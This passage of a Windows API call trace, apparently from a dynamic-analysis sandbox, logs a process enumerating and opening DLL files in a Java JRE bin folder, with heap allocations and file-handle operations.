[0090.227] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0090.227] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88770 [0090.227] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0090.227] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88770 | out: hHeap=0x20000) returned 1 [0090.227] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0090.227] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0090.227] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0090.227] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d050 [0090.227] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x34f90 [0090.227] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d050 | out: hHeap=0x20000) returned 1 [0090.227] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x34f90 | out: hHeap=0x20000) returned 1 [0090.227] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cf10 [0090.227] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x350f0 [0090.227] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf10 | out: hHeap=0x20000) returned 1 [0090.227] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x350f0 | out: hHeap=0x20000) returned 1 [0090.227] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88770 [0090.227] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6cdf0 [0090.227] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0090.227] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x76) returned 0x6a9b0 [0090.227] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6cdf0 | out: hHeap=0x20000) returned 1 [0090.227] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0090.227] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75dc8 [0090.227] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6a9b0 | out: hHeap=0x20000) returned 1 [0090.227] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0090.227] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0090.228] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0090.228] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0090.228] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75dc8 | out: hHeap=0x20000) returned 1 [0090.228] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88770 | out: hHeap=0x20000) returned 1 [0090.228] AreFileApisANSI () returned 1 [0090.228] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\decora_sse.dll", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\decora_sse.dll", lpUsedDefaultChar=0x0) returned 54 [0090.228] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53838 [0090.228] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0090.228] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0090.228] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d000 [0090.228] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d050 [0090.228] AreFileApisANSI () returned 1 [0090.228] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53838, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 54 [0090.228] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x6c) returned 0x75dc8 [0090.228] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53838, cbMultiByte=-1, lpWideCharStr=0x75dc8, cchWideChar=54 | out: lpWideCharStr="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\decora_sse.dll") returned 54 [0090.228] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\decora_sse.dll" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\decora_sse.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x360 [0090.229] GetFileType (hFile=0x360) returned 0x1 [0090.229] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75dc8 | out: hHeap=0x20000) returned 1 [0090.229] SetFilePointerEx (in: hFile=0x360, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5e8 | out: lpNewFilePointer=0x0) returned 1 [0090.229] SetFilePointerEx (in: hFile=0x360, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f59c | out: lpNewFilePointer=0x0) returned 1 [0090.229] SetFilePointerEx (in: hFile=0x360, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5b4 | out: lpNewFilePointer=0x0) returned 1 [0090.229] CloseHandle (hObject=0x360) returned 1 [0090.230] AreFileApisANSI () returned 1 [0090.230] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53838, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 54 [0090.230] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x6c) returned 0x76188 [0090.230] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53838, cbMultiByte=-1, lpWideCharStr=0x76188, cchWideChar=54 | out: lpWideCharStr="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\decora_sse.dll") returned 54 [0090.230] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\decora_sse.dll" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\decora_sse.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x360 [0090.230] GetFileType (hFile=0x360) returned 0x1 [0090.230] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x76188 | out: hHeap=0x20000) returned 1 [0090.230] CloseHandle (hObject=0x360) returned 1 [0090.230] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88770 [0090.230] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88450 [0090.230] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0090.230] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887c0 [0090.230] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0090.230] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0090.230] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88770 | out: hHeap=0x20000) returned 1 [0090.230] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887c0 | out: hHeap=0x20000) returned 1 [0090.230] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88770 [0090.230] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88450 [0090.230] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0090.230] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0090.230] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0090.231] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0090.231] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88770 | out: hHeap=0x20000) returned 1 [0090.231] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0090.231] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88770 [0090.231] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88450 [0090.231] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0090.231] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0090.231] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0090.231] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0090.231] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88770 | out: hHeap=0x20000) returned 1 [0090.231] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0090.231] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0090.231] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88450 [0090.231] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0090.231] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88770 [0090.231] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0090.231] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0090.231] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0090.231] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88450 [0090.231] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88770 | out: hHeap=0x20000) returned 1 [0090.231] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0090.231] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0090.231] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0090.231] AreFileApisANSI () returned 1 [0090.231] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53838, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 54 [0090.231] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x6c) returned 0x76188 [0090.231] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53838, cbMultiByte=-1, lpWideCharStr=0x76188, cchWideChar=54 | out: lpWideCharStr="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\decora_sse.dll") returned 54 [0090.231] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\decora_sse.dll" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\decora_sse.dll"), fInfoLevelId=0x0, lpFileInformation=0x313f6c0 | out: lpFileInformation=0x313f6c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa742cea6, ftCreationTime.dwHighDateTime=0x1d327cc, ftLastAccessTime.dwLowDateTime=0xa742cea6, ftLastAccessTime.dwHighDateTime=0x1d327cc, ftLastWriteTime.dwLowDateTime=0xa742cea6, ftLastWriteTime.dwHighDateTime=0x1d327cc, nFileSizeHigh=0x0, nFileSizeLow=0x15040)) returned 1 [0090.231] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x76188 | out: hHeap=0x20000) returned 1 [0090.231] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d050 | out: hHeap=0x20000) returned 1 [0090.231] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d000 | out: hHeap=0x20000) returned 1 [0090.231] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53838 | out: hHeap=0x20000) returned 1 [0090.231] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0090.231] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0090.231] FindNextFileW (in: hFindFile=0x78610, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa742cea6, ftCreationTime.dwHighDateTime=0x1d327cc, ftLastAccessTime.dwLowDateTime=0xa742cea6, ftLastAccessTime.dwHighDateTime=0x1d327cc, ftLastWriteTime.dwLowDateTime=0xa742cea6, ftLastWriteTime.dwHighDateTime=0x1d327cc, nFileSizeHigh=0x0, nFileSizeLow=0x8f840, dwReserved0=0x313f518, dwReserved1=0x77892bc0, cFileName="deploy.dll", cAlternateFileName="")) returned 1 [0090.231] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88770 [0090.232] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0090.232] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887c0 [0090.232] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0090.232] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887c0 | out: hHeap=0x20000) returned 1 [0090.232] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0090.232] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88770 | out: hHeap=0x20000) returned 1 [0090.232] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0090.232] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d000 [0090.232] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x35090 [0090.232] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d000 | out: hHeap=0x20000) returned 1 [0090.232] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x35090 | out: hHeap=0x20000) returned 1 [0090.232] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cf90 [0090.232] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x34fd0 [0090.232] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf90 | out: hHeap=0x20000) returned 1 [0090.232] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x34fd0 | out: hHeap=0x20000) returned 1 [0090.232] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88450 [0090.232] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d580 [0090.232] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88770 [0090.232] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x76) returned 0x6a430 [0090.232] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d580 | out: hHeap=0x20000) returned 1 [0090.232] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88770 | out: hHeap=0x20000) returned 1 [0090.232] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75b70 [0090.232] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6a430 | out: hHeap=0x20000) returned 1 [0090.232] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0090.232] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0090.232] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0090.232] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0090.232] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75b70 | out: hHeap=0x20000) returned 1 [0090.232] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0090.232] AreFileApisANSI () returned 1 [0090.232] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\deploy.dll", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\deploy.dll", lpUsedDefaultChar=0x0) returned 50 [0090.232] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53298 [0090.232] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0090.232] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0090.232] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf10 [0090.232] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf20 [0090.233] AreFileApisANSI () returned 1 [0090.233] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53298, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 50 [0090.233] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x64) returned 0x46208 [0090.233] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53298, cbMultiByte=-1, lpWideCharStr=0x46208, cchWideChar=50 | out: lpWideCharStr="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\deploy.dll") returned 50 [0090.233] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\deploy.dll" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\deploy.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x418 [0090.421] GetFileType (hFile=0x418) returned 0x1 [0090.421] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x46208 | out: hHeap=0x20000) returned 1 [0090.421] SetFilePointerEx (in: hFile=0x418, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5e8 | out: lpNewFilePointer=0x0) returned 1 [0090.421] SetFilePointerEx (in: hFile=0x418, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f59c | out: lpNewFilePointer=0x0) returned 1 [0090.421] SetFilePointerEx (in: hFile=0x418, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5b4 | out: lpNewFilePointer=0x0) returned 1 [0090.422] CloseHandle (hObject=0x418) returned 1 [0090.423] AreFileApisANSI () returned 1 [0090.423] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53298, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 50 [0090.423] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x64) returned 0x46a58 [0090.423] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53298, cbMultiByte=-1, lpWideCharStr=0x46a58, cchWideChar=50 | out: lpWideCharStr="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\deploy.dll") returned 50 [0090.423] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\deploy.dll" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\deploy.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x418 [0090.423] GetFileType (hFile=0x418) returned 0x1 [0090.423] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x46a58 | out: hHeap=0x20000) returned 1 [0090.423] CloseHandle (hObject=0x418) returned 1 [0090.423] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88450 [0090.423] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0090.423] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887c0 [0090.423] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0090.423] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887c0 | out: hHeap=0x20000) returned 1 [0090.423] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0090.423] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0090.423] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0090.424] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0090.424] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88770 [0090.424] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0090.424] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0090.424] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0090.424] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88770 | out: hHeap=0x20000) returned 1 [0090.424] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0090.424] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0090.424] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0090.424] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0090.424] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88450 [0090.424] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88770 [0090.424] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0090.424] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0090.424] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0090.424] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88770 | out: hHeap=0x20000) returned 1 [0090.424] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88450 [0090.424] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0090.424] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887c0 [0090.424] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0090.424] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887c0 | out: hHeap=0x20000) returned 1 [0090.424] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0090.424] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0090.424] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0090.424] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0090.424] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0090.424] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0090.424] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0090.424] AreFileApisANSI () returned 1 [0090.424] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53298, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 50 [0090.424] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x64) returned 0x46828 [0090.424] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53298, cbMultiByte=-1, lpWideCharStr=0x46828, cchWideChar=50 | out: lpWideCharStr="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\deploy.dll") returned 50 [0090.424] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\deploy.dll" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\deploy.dll"), fInfoLevelId=0x0, lpFileInformation=0x313f6c0 | out: lpFileInformation=0x313f6c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa742cea6, ftCreationTime.dwHighDateTime=0x1d327cc, ftLastAccessTime.dwLowDateTime=0xa742cea6, ftLastAccessTime.dwHighDateTime=0x1d327cc, ftLastWriteTime.dwLowDateTime=0xa742cea6, ftLastWriteTime.dwHighDateTime=0x1d327cc, nFileSizeHigh=0x0, nFileSizeLow=0x8f840)) returned 1 [0090.424] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x46828 | out: hHeap=0x20000) returned 1 [0090.425] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf20 | out: hHeap=0x20000) returned 1 [0090.425] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf10 | out: hHeap=0x20000) returned 1 [0090.425] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53298 | out: hHeap=0x20000) returned 1 [0090.425] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0090.425] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0090.425] FindNextFileW (in: hFindFile=0x78610, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xa742cea6, ftCreationTime.dwHighDateTime=0x1d327cc, ftLastAccessTime.dwLowDateTime=0xa0f2891a, 